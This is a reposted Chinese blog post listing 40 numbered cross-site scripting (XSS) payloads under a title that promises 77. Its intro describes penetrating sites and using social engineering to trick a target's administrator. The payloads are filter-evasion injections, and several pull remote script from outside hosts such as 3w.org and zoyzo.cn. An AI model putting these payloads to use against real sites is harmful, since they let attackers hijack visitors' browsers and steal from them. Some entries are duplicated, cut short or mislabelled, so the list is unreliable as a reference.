77种网站XSS跨站攻击脚本语法(转载)

XSS又叫CSS (Cross-Site Script) ,跨站脚本攻击。恶意攻击者往Web页面里插入恶意html代码

当用户浏览该页之时,嵌入其中Web里面的html代码会被执行,从而达到恶意用户的特殊目的。

XSS分两类:

一类是来自内部的攻击,主要指的是利用程序自身的漏洞,构造跨站语句,如:dvbbs的showerror.asp存在的跨站漏洞。

另一类则是来自外部的攻击,主要指的自己构造XSS跨站漏洞网页或者寻找非目标机以外的有跨站漏洞的网页。

如当我们要渗透一个站点,我们自己构造一个有跨站漏洞的网页,然后构造跨站语句,通过结合其它技术,如社会工程学等,欺骗目标服务器的管理员打开

(1)普通的XSS JavaScript注入

<SCRIPT SRC=https://3w.org/XSS/xss.js></SCRIPT>


(2)IMG标签XSS使用JavaScript命令

<SCRIPT SRC=https://3w.org/XSS/xss.js></SCRIPT>


(3)IMG标签无分号无引号

<IMG SRC=javascript:alert(‘XSS’)>


(4)IMG标签大小写不敏感

<IMG SRC=JaVaScRiPt:alert(‘XSS’)>


(5)HTML编码(必须有分号)

<IMG SRC=javascript:alert(“XSS”)>


(6)修正缺陷IMG标签

<IMG “””><SCRIPT>alert(“XSS”)</SCRIPT>”>


(7)formCharCode标签(计算器)

<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>


(8)UTF-8的Unicode编码(计算器)

<IMG SRC=jav..省略..S’)>


(9)7位的UTF-8的Unicode编码是没有分号的(计算器)

<IMG SRC=jav..省略..S’)>


(10)十六进制编码也是没有分号(计算器)

<IMG SRC=&#x6A&#x61&#x76&#x61..省略..&#x58&#x53&#x53&#x27&#x29>


(11)嵌入式标签,将Javascript分开

<IMG SRC=”jav ascript:alert(‘XSS’);”>


(12)嵌入式编码标签,将Javascript分开

<IMG SRC=”jav ascript:alert(‘XSS’);”>


(13)嵌入式换行符

<IMG SRC=”jav ascript:alert(‘XSS


’);”>


(14)嵌入式回车

<IMG SRC=”jav ascript:alert(‘XSS’);”>


(15)嵌入式多行注入JavaScript,这是XSS极端的例子

<IMG SRC=”javascript:alert(‘XSS‘)”>


(16)解决限制字符(要求同页面)

<script>z=’document.’</script>

<script>z=z+’write(“‘</script>

<script>z=z+’<script’</script>

<script>z=z+’ src=ht’</script>

<script>z=z+’tp://ww’</script>

<script>z=z+’w.zoyzo’</script>

<script>z=z+’.cn/1.’</script>

<script>z=z+’js></sc’</script>

<script>z=z+’ript>”)’</script>

<script>eval_r(z)</script>


(17)空字符

perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out


(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用

perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out


(19)Spaces和meta前的IMG标签

<IMG SRC=” javascript:alert(‘XSS’);”>


(20)Non-alpha-non-digit XSS

<SCRIPT/XSS SRC=”https://3w.org/XSS/xss.js”></SCRIPT>


(21)Non-alpha-non-digit XSS to 2

<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>


(22)Non-alpha-non-digit XSS to 3

<SCRIPT/SRC=”https://3w.org/XSS/xss.js”></SCRIPT>


(23)双开括号

<<SCRIPT>alert(“XSS”);//<</SCRIPT>


(24)无结束脚本标记(仅火狐等浏览器)

<SCRIPT SRC=https://3w.org/XSS/xss.js?<B>


(25)无结束脚本标记2

<SCRIPT SRC=//3w.org/XSS/xss.js>


(26)半开的HTML/JavaScript XSS

<IMG SRC=”javascript:alert(‘XSS’)”


(27)双开角括号

<iframe src=https://3w.org/XSS.html>


(28)无单引号 双引号 分号

<SCRIPT>a=/XSS/

alert(a.source)</SCRIPT>


(29)换码过滤的JavaScript

[code]\”;alert(‘XSS’);//


(30)结束Title标签

</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>


(31)Input Image

<INPUT SRC=”javascript:alert(‘XSS’);”>


(32)BODY Image

<BODY BACKGROUND=”javascript:alert(‘XSS’)”>


(33)BODY标签

<BODY(‘XSS’)>


(34)IMG Dynsrc

<IMG DYNSRC=”javascript:alert(‘XSS’)”>


(35)IMG Lowsrc

<IMG LOWSRC=”javascript:alert(‘XSS’)”>


(36)BGSOUND

<BGSOUND SRC=”javascript:alert(‘XSS’);”>


(37)STYLE sheet

<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>


(38)远程样式表

<LINK REL=”stylesheet” HREF=”https://3w.org/xss.css”>


(39)List-style-image(列表式)

<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS


(40)IMG VBscript

<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS

本文来源于iick's blog     https://www.hack1990.com/ ,原文地址:https://www.hack1990.com/post/77种网站XSS跨站攻击脚本语法.html



评论
热度(5)
© 此间少年 / Powered by LOFTER